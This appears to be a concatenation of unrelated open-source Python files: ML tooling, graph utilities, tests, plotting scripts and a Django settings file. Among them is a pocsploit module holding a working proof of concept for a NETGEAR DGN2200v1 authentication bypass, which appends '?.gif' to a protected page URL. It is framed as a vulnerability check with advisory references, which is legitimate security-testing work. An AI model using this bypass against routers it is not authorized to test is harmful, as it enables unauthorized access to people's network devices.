choice = np.random.permutation(in_num_points)
else:
choice = np.arange(in_num_points)
assert out_num_points > 0, 'out_num_points = %d must be positive int!'%out_num_points
if in_num_points >= out_num_points:
choice = choice[:out_num_points]
else:
num_pad = out_num_points - in_num_points
pad = np.random.choice(choice, num_pad, replace=True)
choice = np.concatenate([choice, pad])
return choice
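# Minimal sketch (assumption: 5 input points padded to 8): the returned
# indexes sample a fixed-size point set, repeating points when padding.
def _example_crop_or_pad_choice():
    pts = np.random.rand(5, 2)
    choice = crop_or_pad_choice(in_num_points=5, out_num_points=8, shuffle=True)
    fixed_size_pts = pts[choice]   # shape (8, 2)
    return fixed_size_pts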
|
kolibri/core/logger/constants/interaction_types.py
|
MBKayro/kolibri
| 545 |
101698
|
<reponame>MBKayro/kolibri<filename>kolibri/core/logger/constants/interaction_types.py
HINT = "hint"
ANSWER = "answer"
ERROR = "error"
|
tools/utilities/optimizer/profile_builder.py
|
awf/ELL
| 2,094 |
101712
|
#!/usr/bin/env python3
####################################################################################################
#
# Project: Embedded Learning Library (ELL)
# File: profile_builder.py
# Authors: <NAME>
#
# Requires: Python 3.x
#
####################################################################################################
import sys
import argparse
import os
import zipfile
import shutil
import dask
import logger
import find_ell
import optimizer_util
script_path = os.path.dirname(os.path.abspath(__file__))
sys.path.append(os.path.join(script_path, "..", "..", "wrap"))
import wrap
global_logger = logger.setup()
class BuildJob():
def __init__(self, profiler_data, ell_root, ell_build_root, target="pi3", language="cpp", include_exercise_models=False):
self.profiler_data = profiler_data
self.ell_root = ell_root
self.ell_build_root = ell_build_root
self.target = target
self.language = language
self.include_exercise_models = include_exercise_models
def run(self):
model_id_string = "{} ({})".format(self.profiler_data.model_name, self.profiler_data.profile_options.to_long_string())
global_logger = logger.setup(format="{} %(message)s".format(model_id_string))
global_logger.info("Compiling model {} ...".format(model_id_string))
profile_src_path = os.path.join(self.ell_build_root, "tools", "utilities", "profile")
# Take all .cpp, .h, .cmd, .sh, and .cmake files from the build/tools/utilities/profile directory; only the CMakeLists file is hard-coded by name
all_profile_files = os.listdir(profile_src_path)
profile_extensions_to_deploy = [".cpp", ".h", ".cmd", ".sh", ".cmake"]
profile_src_files = [filename for filename in all_profile_files if True in [filename.endswith(ext) for ext in profile_extensions_to_deploy]]
cmakelists_file_to_deploy = "CMakeLists-device-parallel.txt.in"
profile_src_files.append(cmakelists_file_to_deploy)
profile_src_file_renames = {
cmakelists_file_to_deploy : "CMakeLists.txt"
}
base_wrap_args = [
"--model_file",
self.profiler_data.model_path,
"--module_name",
"ELL", # Profiler C++ code assumes the module name is ELL
"--target",
self.target,
"--language",
self.language,
"--outdir",
self.profiler_data.built_profilers_path,
]
base_wrap_args.extend(self.profiler_data.profile_options.base_wrap_args())
opt_wrap_args = [
"--llvm_format",
"ir"
]
no_opt_wrap_args = [
"--no_opt_tool",
"--no_llc_tool",
"--llvm_format",
"obj"
]
profile_wrap_args = ["--profile"]
profile_options_additional_compile_args = self.profiler_data.profile_options.additional_compile_args()
if profile_options_additional_compile_args:
additional_compile_args = ["--"] + profile_options_additional_compile_args
else:
additional_compile_args = []
no_opt_noprofile_builder = wrap.ModuleBuilder()
no_opt_noprofile_wrap_args = base_wrap_args + no_opt_wrap_args + additional_compile_args
no_opt_noprofile_builder.parse_command_line(no_opt_noprofile_wrap_args)
no_opt_profile_builder = wrap.ModuleBuilder()
no_opt_profile_wrap_args = base_wrap_args + no_opt_wrap_args + profile_wrap_args + additional_compile_args
no_opt_profile_builder.parse_command_line(no_opt_profile_wrap_args)
opt_noprofile_builder = wrap.ModuleBuilder()
opt_noprofile_wrap_args = base_wrap_args + opt_wrap_args + additional_compile_args
opt_noprofile_builder.parse_command_line(opt_noprofile_wrap_args)
opt_profile_builder = wrap.ModuleBuilder()
opt_profile_wrap_args = base_wrap_args + opt_wrap_args + profile_wrap_args + additional_compile_args
opt_profile_builder.parse_command_line(opt_profile_wrap_args)
# Profiler and ExecuteModel binaries expect to find the following header and object files, built with different compile args:
# compiled_model.o
# compiled_model.h
# compiled_model_opt.o
# compiled_model_opt.h
# compiled_model_noprofile.o
# compiled_model_noprofile.h
# compiled_model_noprofile_opt.o
# compiled_model_noprofile_opt.h
built_name_prefix = "compiled_model"
noprofile_suffix = "_noprofile"
opt_suffix = "_opt"
obj_suffix = ".o"
header_suffix = ".h"
file_suffixes = [obj_suffix, header_suffix]
base_model_filename = os.path.basename(self.profiler_data.model_path)
base_model_name = os.path.splitext(base_model_filename)[0]
no_opt_noprofile_renames = { (base_model_name + file_suffix) : (built_name_prefix + noprofile_suffix + file_suffix) for file_suffix in file_suffixes }
no_opt_profile_renames = { (base_model_name + file_suffix) : (built_name_prefix + file_suffix) for file_suffix in file_suffixes }
opt_noprofile_renames = { (base_model_name + file_suffix) : (built_name_prefix + noprofile_suffix + opt_suffix + file_suffix) for file_suffix in file_suffixes }
opt_profile_renames = { (base_model_name + file_suffix) : (built_name_prefix + opt_suffix + file_suffix) for file_suffix in file_suffixes }
builders_and_rename_maps = [
(no_opt_profile_builder, no_opt_profile_renames),
(opt_profile_builder, opt_profile_renames)
]
if self.include_exercise_models:
builders_and_rename_maps.extend([
(no_opt_noprofile_builder, no_opt_noprofile_renames),
(opt_noprofile_builder, opt_noprofile_renames)
])
target_files = []
for builder_and_rename_map in builders_and_rename_maps:
target_files.extend([builder_and_rename_map[1][filename] for filename in builder_and_rename_map[1]])
existing_files = os.listdir(self.profiler_data.built_profilers_path)
        need_to_build = not all(filename in existing_files for filename in target_files)
if need_to_build:
try:
for builder_and_rename_map in builders_and_rename_maps:
builder = builder_and_rename_map[0]
rename_map = builder_and_rename_map[1]
builder.run()
for filename in rename_map:
src_path = os.path.join(self.profiler_data.built_profilers_path, filename)
dst_path = os.path.join(self.profiler_data.built_profilers_path, rename_map[filename])
shutil.copy(src_path, dst_path)
except:
errorType, value, traceback = sys.exc_info()
msg = "### WrapException: %s: %s" % (str(errorType), str(value))
global_logger.error(msg)
sys.exit(1)
else:
global_logger.info("Target files already exist in path {}, skipping build".format(self.profiler_data.built_profilers_path))
keep_files = target_files
# Copy profile source code into place
for filename in profile_src_files:
src_path = os.path.join(profile_src_path, filename)
dst_name = profile_src_file_renames[filename] if filename in profile_src_file_renames else filename
dst_path = os.path.join(self.profiler_data.built_profilers_path, dst_name)
keep_files.append(dst_name)
shutil.copy(src_path, dst_path)
all_built_files = os.listdir(self.profiler_data.built_profilers_path)
delete_files = [filename for filename in all_built_files if filename not in keep_files]
for filename in delete_files:
full_path = os.path.join(self.profiler_data.built_profilers_path, filename)
if os.path.isfile(full_path):
global_logger.info("Cleaning temporary build file {}".format(full_path))
os.remove(full_path)
global_logger.info("Done compiling model {}.".format(model_id_string))
def build_model_profilers(model_path, output_path, ell_root, ell_build_root, all_profile_options, models=None, target="pi3", parallel_count=1, include_exercise_models=False):
os.makedirs(output_path, exist_ok=True)
all_profiler_data = optimizer_util.make_profiler_data(model_path, output_path, all_profile_options, models)
build_jobs = [BuildJob(profiler_data, ell_root, ell_build_root, target) for profiler_data in all_profiler_data]
values = [dask.delayed(job.run)() for job in build_jobs]
if len(build_jobs) < parallel_count:
parallel_count = len(build_jobs)
global_logger.info("Compiling {} models with {} processes".format(len(build_jobs), parallel_count))
results = dask.compute(*values, scheduler="processes", num_workers=parallel_count)
return all_profiler_data
def add_profile_builder_args(arg_parser):
arg_parser.add_argument("--parallel_build", help="The maximum number of build processes to run in parallel.", default=4, type=int)
arg_parser.add_argument("--include_exercise_models", help="Build and run the exercise_models executables that don't have profiling enabled", default=False, action="store_true")
if __name__ == "__main__":
parser = argparse.ArgumentParser("Build model profilers with different convolution configurations")
parser.add_argument("--output_path", "-o", help="Path to store built profiler object files in", required=True)
add_profile_builder_args(parser)
find_ell.add_ell_root_args(parser)
optimizer_util.add_all_shared_args(parser)
args = parser.parse_args()
if not args.ell_root:
raise Exception("ELL root not found")
if not args.ell_build_root:
raise Exception("ELL build root not found")
all_profile_options = optimizer_util.ProfileOptions.parse_option_list_from_file(args.options)
build_model_profilers(model_path=args.model_path,
output_path=args.output_path,
ell_root=args.ell_root,
ell_build_root=args.ell_build_root,
target=args.target,
all_profile_options=all_profile_options,
models=args.models,
parallel_count=args.parallel_build,
include_exercise_models=args.include_exercise_models)
|
nnef_tools/model/utils.py
|
KhronosGroup/NNEF-Tools
| 193 |
101727
|
# Copyright (c) 2020 The Khronos Group Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
def _split_counter_from_name(str):
if len(str) > 0 and not str[-1].isdigit():
return str, None
i = len(str)
while i > 0:
if not str[i-1].isdigit():
return str[:i], int(str[i:])
i -= 1
return None, int(str)
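# Illustrative examples of the split: "conv12" -> ("conv", 12), "relu" -> ("relu", None),
# "42" -> (None, 42).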
def generate_tensor_names_from_op_type(graph, keep_io_names=False):
used_names = set()
if keep_io_names:
used_names.update(tensor.name for tensor in graph.inputs if tensor.name is not None)
used_names.update(tensor.name for tensor in graph.outputs if tensor.name is not None)
op_counts = {}
for op in graph.operations:
for tensor in op.outputs:
if keep_io_names and tensor.name is not None and (tensor in graph.inputs or tensor in graph.outputs):
continue
idx = op_counts.get(op.type, 0) + 1
while op.type + str(idx) in used_names:
idx += 1
op_counts[op.type] = idx
tensor.name = op.type + str(idx)
for tensor in graph.tensors:
if tensor.producer is None:
tensor.name = None
def generate_missing_tensor_names_from_op_type(graph):
counters = {}
for tensor in graph.tensors:
if tensor.name is not None:
name, count = _split_counter_from_name(tensor.name)
if name is not None and count is not None:
counters[name] = max(counters.get(name, 0), count)
for tensor in graph.tensors:
if tensor.name is None and tensor.producer is not None:
op = tensor.producer
idx = counters.get(op.type, 0) + 1
counters[op.type] = idx
tensor.name = op.type + str(idx)
def generate_op_names_from_op_type(graph):
op_counts = {}
for op in graph.operations:
idx = op_counts.get(op.type, 0) + 1
op_counts[op.type] = idx
op.name = op.type + str(idx)
def replace_tensor_in_graph_inputs(graph, old_tensor, new_tensor):
graph.inputs = [new_tensor if t is old_tensor else t for t in graph.inputs]
def replace_tensor_in_graph_outputs(graph, old_tensor, new_tensor):
graph.outputs = [new_tensor if t is old_tensor else t for t in graph.outputs]
def replace_tensor_in_consumers(graph, old_tensor, new_tensor):
for consumer in list(old_tensor.consumers): # copy list to avoid changes during iteration
sequence = tuple if isinstance(consumer.inputs, tuple) else list
consumer.inputs = sequence(new_tensor if t is old_tensor else t for t in consumer.inputs)
replace_tensor_in_graph_outputs(graph, old_tensor, new_tensor)
def replace_tensor_in_producers(graph, old_tensor, new_tensor):
for producer in list(old_tensor.producers): # copy list to avoid changes during iteration
sequence = tuple if isinstance(producer.outputs, tuple) else list
producer.outputs = sequence(new_tensor if t is old_tensor else t for t in producer.outputs)
replace_tensor_in_graph_inputs(graph, old_tensor, new_tensor)
def bypass_and_remove(graph, op, remove_input_not_output=False):
assert len(op.outputs) == 1 and len(op.inputs) == 1
op_input = op.input
op_output = op.output
graph.remove_operation(op, unlink=True)
if remove_input_not_output:
replace_tensor_in_consumers(graph, op_input, op_output)
replace_tensor_in_producers(graph, op_input, op_output)
graph.remove_tensor(op_input)
else:
replace_tensor_in_consumers(graph, op_output, op_input)
replace_tensor_in_producers(graph, op_output, op_input)
graph.remove_tensor(op_output)
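# A minimal usage sketch (the op type name 'copy' is illustrative, and `graph` is assumed
# to be an already-built model graph): remove identity-like single-input/single-output ops
# and reconnect their inputs directly to the downstream consumers.
#
#   for op in [op for op in graph.operations if op.type == 'copy']:
#       bypass_and_remove(graph, op)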
def replace_chain(graph, types, func, allow_forks=False):
def _match_type(type, template):
return type in template if isinstance(template, set) else type == template
def _match_link(op, template, is_last):
return _match_type(op.type, template) and (len(op.outputs) == 1 or is_last)
def _match_chain(op, types, allow_forks):
if not _match_link(op, types[0], is_last=len(types) == 1):
return None
chain = [op]
tensor = op.output
for idx, type in enumerate(types[1:]):
is_last = idx + 1 == len(types) - 1
if not allow_forks and len(tensor.consumers) > 1:
return None
op = next((consumer for consumer in tensor.consumers if _match_link(consumer, type, is_last)), None)
if op is None:
return None
chain.append(op)
if not is_last:
tensor = op.output
return chain
changed = False
i = 0
while i < len(graph.operations):
count = len(graph.operations)
chain = _match_chain(graph.operations[i], types, allow_forks)
if chain is not None and func(*chain) is not False:
k = i
while graph.operations[k] is not chain[-1]:
k += 1
for j in range(count, len(graph.operations)):
graph.move_operation(j, k)
k += 1
offs = len(chain) - 1
while offs > 0 and len(chain[offs - 1].output.consumers) == 1:
offs -= 1
interns = [op.output for op in chain[offs:-1]]
graph.remove_operations(chain[offs:], unlink=True)
graph.remove_tensors(interns)
changed = True
else:
i += 1
return changed
def remove_unreachable(graph):
visited = {tensor.producer for tensor in graph.outputs}
queue = list(visited)
k = 0
while k < len(queue):
op = queue[k]
k += 1
for tensor in op.inputs:
if tensor.producer is not None and tensor.producer not in visited and \
(tensor not in graph.inputs or len(tensor.producer.inputs) == 0):
visited.add(tensor.producer)
queue.append(tensor.producer)
graph.remove_operations({op for op in graph.operations if op not in visited}, unlink=True)
graph.remove_tensors({tensor for tensor in graph.tensors
if len(tensor.producers) == 0 and len(tensor.consumers) == 0
and tensor not in graph.inputs and tensor not in graph.outputs})
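# A minimal cleanup sketch (assumes `graph` was built elsewhere with this model API):
# drop unreachable ops, then re-derive tensor and op names.
#
#   remove_unreachable(graph)
#   generate_tensor_names_from_op_type(graph, keep_io_names=True)
#   generate_op_names_from_op_type(graph)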
|
tests/test_zkviz.py
|
ktw5691/zkviz
| 105 |
101750
|
from pathlib import Path
from tempfile import TemporaryDirectory
from unittest import TestCase
from zkviz import zkviz
class TestListZettels(TestCase):
def test_list_zettels_with_md_extension(self):
# Create a temporary folder and write files in it
with TemporaryDirectory() as tmpdirname:
ext = ".md"
basename = "201906242157"
filepaths = []
for i in range(3):
path = Path(tmpdirname, basename + str(i) + ext)
path.touch()
filepaths.append(str(path))
files_found = zkviz.list_zettels(tmpdirname)
self.assertEqual(filepaths, files_found)
def test_list_zettels_with_txt_extension(self):
# Create a temporary folder and write files in it
with TemporaryDirectory() as tmpdirname:
ext = ".txt"
basename = "201906242157"
filepaths = []
for i in range(3):
path = Path(tmpdirname, basename + str(i) + ext)
path.touch()
filepaths.append(str(path))
files_found = zkviz.list_zettels(tmpdirname, "*.txt")
self.assertEqual(filepaths, files_found)
def test_list_zettels_with_mixed_extensions(self):
# Create a temporary folder and write files in it
with TemporaryDirectory() as tmpdirname:
filepaths = []
basename = "201906242157"
ext = ".txt"
for i in range(5):
path = Path(tmpdirname, basename + str(i) + ext)
path.touch()
filepaths.append(str(path))
ext = ".md"
for i in range(5, 10):
path = Path(tmpdirname, basename + str(i) + ext)
path.touch()
filepaths.append(str(path))
files_found = zkviz.list_zettels(tmpdirname, "*.txt|*.md")
self.assertEqual(filepaths, files_found)
class TestParseArgs(TestCase):
def test_default_extension(self):
args = zkviz.parse_args("")
self.assertEqual(["*.md"], args.pattern)
def test_overwrite_extension(self):
args = zkviz.parse_args(["--pattern", "*.txt"])
self.assertEqual(["*.txt"], args.pattern)
def test_multiple_extensions(self):
args = zkviz.parse_args(["--pattern", "*.txt", "--pattern", "*.md"])
self.assertEqual(["*.txt", "*.md"], args.pattern)
|
rpython/translator/goal/targetgcbench.py
|
nanjekyejoannah/pypy
| 381 |
101758
|
<gh_stars>100-1000
from rpython.translator.goal import gcbench
from rpython.memory.test.test_transformed_gc import MyGcHooks, GcHooksStats
# _____ Define and setup target ___
GC_HOOKS_STATS = GcHooksStats()
def entry_point(argv):
GC_HOOKS_STATS.reset()
ret = gcbench.entry_point(argv)
minors = GC_HOOKS_STATS.minors
steps = GC_HOOKS_STATS.steps
collects = GC_HOOKS_STATS.collects
print 'GC hooks statistics'
print ' gc-minor: ', minors
print ' gc-collect-step: ', steps
print ' gc-collect: ', collects
return ret
def get_gchooks():
return MyGcHooks(GC_HOOKS_STATS)
def target(*args):
gcbench.ENABLE_THREADS = False # not RPython
return entry_point, None
|
ml-models-analyses/readahead-mixed-workload/parse-experiments-with-faults.py
|
drewscottt/kernel-ml
| 167 |
101784
|
<filename>ml-models-analyses/readahead-mixed-workload/parse-experiments-with-faults.py
#!/usr/bin/env python3.9
#
# Copyright (c) 2019-2021 <NAME>
# Copyright (c) 2021-2021 <NAME>
# Copyright (c) 2021-2021 <NAME>
# Copyright (c) 2021-2021 <NAME>
# Copyright (c) 2020-2021 <NAME>
# Copyright (c) 2020-2021 <NAME>
# Copyright (c) 2019-2021 <NAME>
# Copyright (c) 2019-2021 Stony Brook University
# Copyright (c) 2019-2021 The Research Foundation of SUNY
#
# You can redistribute it and/or modify it under the terms of the Apache License,
# Version 2.0 (http://www.apache.org/licenses/LICENSE-2.0).
#
from collections import defaultdict
# import pandas as pd
# pandas makes it easy to calculate mean perf diff
# but plotting through pandas is hard because we need to use subplots
# but each subplot needs its own x vector because the data isn't sampled exactly every second
# in fact it can be as bad as every other second, so one graph might be stretched more
# I'm not sure how to do this with the pandas plot function...
import argparse
import os
import matplotlib.pyplot as plt
from matplotlib import rc
from enum import Enum
from kmlparsing import *
import sys
import csv
#rc('font', **{'family': 'Calibri'})
class BMType(Enum):
KML_SEQ = 0
KML_RAND = 1
VAN_SEQ = 2
VAN_RAND = 3
RA = 4
KML_SEQ_MAJ = 5
KML_RAND_MAJ = 6
VAN_SEQ_MAJ = 7
VAN_RAND_MAJ = 8
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='Parse and compare experiments')
parser.add_argument(
'--kml_seq_file',
dest='kml_seq_file',
required=False,
default='detail-kml-seq.txt',
help='relative path to sequential detail file for kml experiments')
parser.add_argument(
'--kml_rand_file',
dest='kml_rand_file',
required=False,
default='detail-kml-rand.txt',
help='relative path to random detail file for kml experiments')
parser.add_argument(
'--vanilla_seq_file',
dest='vanilla_seq_file',
required=False,
default='detail-vanilla-seq.txt',
help='relative path to sequential detail file for vanilla experiments')
parser.add_argument(
'--vanilla_rand_file',
dest='vanilla_rand_file',
required=False,
default='detail-vanilla-rand.txt',
help='relative path to random detail file for vanilla experiments')
parser.add_argument('--kern_log_file',
dest='kern_log_file',
required=False,
default='kern.log',
help='path to kern.log file')
parser.add_argument('--bench_output_dir',
dest="bench_output_dir",
required=False,
default='.',
help='directory containing bench_output_* files')
parser.add_argument('--output_dir',
dest='output_dir',
required=False,
default='output',
help='output directory')
parser.add_argument('--device',
dest='device',
required=False,
help='device name (ex: sdb1)')
csv_fields = ['0', '1', '2'] # CSV header fields used by perf diff graphing script
csv_output = [] # CSV rows for perf diff graphing script
args = parser.parse_args()
path_save = args.output_dir
result_kml = defaultdict(list)
parse_detail_file(result_kml, args.kml_seq_file)
parse_detail_file(result_kml, args.kml_rand_file)
result_vanilla = defaultdict(list)
parse_detail_file(result_vanilla, args.vanilla_seq_file)
parse_detail_file(result_vanilla, args.vanilla_rand_file)
readahead_values = parse_kern_log_file(args.kern_log_file)
# values from /usr/bin/time -v
time_values_kml = defaultdict(list)
time_values_vanilla = defaultdict(list)
for combo in generate_combos():
# TODO don't hardcode sdb1
fn = os.path.join(os.curdir, f'bench_output_{combo[0]}_{combo[1]}_kml')
parse_bench_output(time_values_kml, fn, combo)
fn = os.path.join(os.curdir, f'bench_output_{combo[0]}_{combo[1]}_vanilla')
parse_bench_output(time_values_vanilla, fn, combo)
#TODO sync up time output with detail output? or at least figure out why they differ
if not os.path.exists(os.path.join(os.curdir, path_save)):
os.makedirs(os.path.join(os.curdir, path_save))
# key validation
if set(result_kml.keys()) != set(result_vanilla.keys()):
print('Keys not matching')
print(result_kml.keys())
print(result_vanilla.keys())
exit()
for key in readahead_values.keys():
# second element of tuple is background workload
data = []
data.append(result_kml[key])
data.append(result_kml[tuple(reversed(key))])
data.append(result_vanilla[key])
data.append(result_vanilla[tuple(reversed(key))])
data.append(readahead_values[key])
data.append(time_values_kml[key])
data.append(time_values_kml[tuple(reversed(key))])
data.append(time_values_vanilla[key])
data.append(time_values_vanilla[tuple(reversed(key))])
# Column names
# Calculate average performance difference between vanilla and KML runs
# convert seconds to minutes
# convert ops to kilo ops
for benchmark in BMType:
if benchmark.value < BMType.RA.value:
for i in range(len(data[benchmark.value])):
data[benchmark.value][i][0] /= 60
data[benchmark.value][i][1] /= 1000
elif benchmark.value > BMType.RA.value:
for i in range(len(data[benchmark.value])):
data[benchmark.value][i][0] /= 60
seq_perf_diff = mean([x[1] for x in data[BMType.KML_SEQ.value]]) / mean([x[1] for x in data[BMType.VAN_SEQ.value]])
rand_perf_diff = mean([x[1] for x in data[BMType.KML_RAND.value]]) / mean([x[1] for x in data[BMType.VAN_RAND.value]])
print(*key)
print(f'Sequential perf diff: {seq_perf_diff}\nRandom perf diff: {rand_perf_diff}\n')
# Quick-access Plot Parameters
x_label = 'Time (minutes)'
y_label = 'Throughput (1000s ops/sec)'
y2_label = 'Number of Major Page Faults'
# plot throughput
fig, (seq_axs, rand_axs) = plt.subplots(2)
x, y = zip(*data[BMType.KML_SEQ.value])
seq_axs.plot(x, y)
x, y = zip(*data[BMType.VAN_SEQ.value])
seq_axs.plot(x, y)
seq_maj_axs = seq_axs.twinx()
x, y = find_avg_faults(data[BMType.KML_SEQ_MAJ.value])
seq_maj_axs.plot(x, y, color=(0,1,0))
x, y = find_avg_faults(data[BMType.VAN_SEQ_MAJ.value])
seq_maj_axs.plot(x, y, color=(0,0.5,0.5))
x, y = zip(*data[BMType.KML_RAND.value])
rand_axs.plot(x, y, color=(1,0,0))
x, y = zip(*data[BMType.VAN_RAND.value])
rand_axs.plot(x, y, color=(1,0,1))
rand_maj_axs = rand_axs.twinx()
x, y = find_avg_faults(data[BMType.KML_RAND_MAJ.value])
rand_maj_axs.plot(x, y, color=(0,1,1))
x, y = find_avg_faults(data[BMType.VAN_RAND_MAJ.value])
rand_maj_axs.plot(x, y, color=(0,0,0))
# fix axes limits
seq_axs.set_xlim(0, seq_axs.get_xlim()[1])
rand_axs.set_xlim(0, rand_axs.get_xlim()[1])
seq_axs.set_ylim(0, seq_axs.get_ylim()[1])
rand_axs.set_ylim(0, rand_axs.get_ylim()[1])
#remove border from graphs
seq_axs.spines['top'].set_visible(False)
seq_axs.spines['right'].set_visible(False)
seq_axs.spines['bottom'].set_visible(False)
seq_axs.spines['left'].set_visible(False)
rand_axs.spines['top'].set_visible(False)
rand_axs.spines['right'].set_visible(False)
rand_axs.spines['bottom'].set_visible(False)
rand_axs.spines['left'].set_visible(False)
seq_maj_axs.spines['top'].set_visible(False)
seq_maj_axs.spines['right'].set_visible(False)
seq_maj_axs.spines['bottom'].set_visible(False)
seq_maj_axs.spines['left'].set_visible(False)
rand_maj_axs.spines['top'].set_visible(False)
rand_maj_axs.spines['right'].set_visible(False)
rand_maj_axs.spines['bottom'].set_visible(False)
rand_maj_axs.spines['left'].set_visible(False)
# create legend
labels = []
labels.append(f'{key[0]}_kml')
labels.append(f'{key[0]}_vanilla')
labels.append(f'{key[1]}_kml')
labels.append(f'{key[1]}_vanilla')
#labels.append('readahead')
labels.append(f'{key[0]}_kml_major_faults')
labels.append(f'{key[0]}_vanilla_major_faults')
labels.append(f'{key[1]}_kml_major_faults')
labels.append(f'{key[1]}_vanilla_major_faults')
fig.legend(labels,
loc='upper center',
ncol=2, # Precise legend arrangement...
#bbox_to_anchor=(0, 1.2, 1, .102),
frameon=False) # ...and placement
fig.subplots_adjust(top=0.75, left=0.15)
# fix labels
fig.text(0.5, 0.03, x_label, ha='center', va='center')
fig.text(0.09, 0.49, y_label, ha='center', va='center', rotation='vertical')
fig.text(0.98, 0.5, y2_label, ha='center', va='center', rotation='vertical')
# not sure how to position suptitle properly
#fig.suptitle('Throughput Over Time', fontweight='bold')
# configure ticks
for axis in [seq_axs, rand_axs]:
axis.tick_params(which='both',
bottom=True,
top=False,
left=False,
right=False,
zorder=10) # No tickmarks
axis.yaxis.grid(alpha=.4) # Only left y-axis gridlines
seq_axs.set_xticklabels([])
plt.box(False) # No border or enclosing box part 2
# Save data and figure to CSV and PDF respectively
keytxt = '-'.join(key)
print('saving to', keytxt)
csv_output.append([keytxt, seq_perf_diff, rand_perf_diff])
fig.set_size_inches(9,4) #Set the base size of the figure
plt.savefig(os.path.join(os.curdir, path_save,
f'{keytxt}.pdf'), transparent=True,bbox_inches='tight')
filename = 'perfdiff.csv'
with open(filename, 'w') as f:
writer = csv.writer(f)
writer.writerow(csv_fields)
writer.writerows(csv_output)
|
modules/vulnerabilities/other/netgear-router-auth-bypass.py
|
cckuailong/pocsploit
| 106 |
101787
|
<gh_stars>100-1000
import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''NETGEAR DGN2200v1 Router Authentication Bypass''',
"description": '''NETGEAR DGN2200v1 Router does not require authentication if a page has ".jpg", ".gif", or "ess_" substrings, however matches the entire URL. Any page on the device can therefore be accessed, including those that require authentication, by appending a GET variable with the relevant substring (e.g., "?.gif").''',
"severity": "high",
"references": [
"https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/",
"https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1"
],
"classification": {
"cvss-metrics": "",
"cvss-score": "",
"cve-id": "",
"cwe-id": ""
},
"metadata":{
"vuln-target": "",
},
"tags": ["netgear", "auth-bypass", "router"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = """/WAN_wan.htm?.gif"""
method = "GET"
data = """"""
headers = {'Accept': '*/*'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/WAN_wan.htm?.gif"""
method = "GET"
data = """"""
headers = {'Accept': '*/*'}
resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if (resp1.status_code == 200) and ("""<title>WAN Setup</title>""" in resp1.text):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url
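# A minimal local usage sketch; the target address is a placeholder for a device you are
# authorized to test.
if __name__ == '__main__':
    print(poc('http://192.168.1.1'))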
|
revise/libs/python/pyste/tests/runtests.py
|
DD-L/deel.boost.python
| 198 |
101810
|
<reponame>DD-L/deel.boost.python
# Copyright <NAME> 2003. Use, modification and
# distribution is subject to the Boost Software License, Version 1.0.
# (See accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
#!/usr/bin/python
import sys
sys.path.append('../src/Pyste')
import unittest
import os.path
from glob import glob
if __name__ == '__main__':
loader = unittest.defaultTestLoader
tests = []
for name in glob('*UT.py'):
module = __import__(os.path.splitext(name)[0])
tests.append(loader.loadTestsFromModule(module))
runner = unittest.TextTestRunner()
result = runner.run(unittest.TestSuite(tests))
sys.exit(not result.wasSuccessful())
|
web/iosblog/settings.py
|
mrscorpion/MSEasyReader
| 519 |
101811
|
<filename>web/iosblog/settings.py<gh_stars>100-1000
"""
Django settings for iosblog project.
Generated by 'django-admin startproject' using Django 1.9.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
if 'IOSBLOGRUNMODE' in os.environ:
RUNMODE = os.environ['IOSBLOGRUNMODE']
else:
RUNMODE = 'develop'
if RUNMODE == 'production':
DEBUG = False
with open('/etc/iosblog/secret_key.txt') as f:
SECRET_KEY = f.read().strip()
else:
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
    SECRET_KEY = '<KEY>'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['.iosblog.cc']
# Application definition
INSTALLED_APPS = [
'x123.apps.X123Config',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'oauth2_provider',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'iosblog.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'iosblog.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'OPTIONS': {
'read_default_file': os.path.join(BASE_DIR, 'db.cnf')
}
}
}
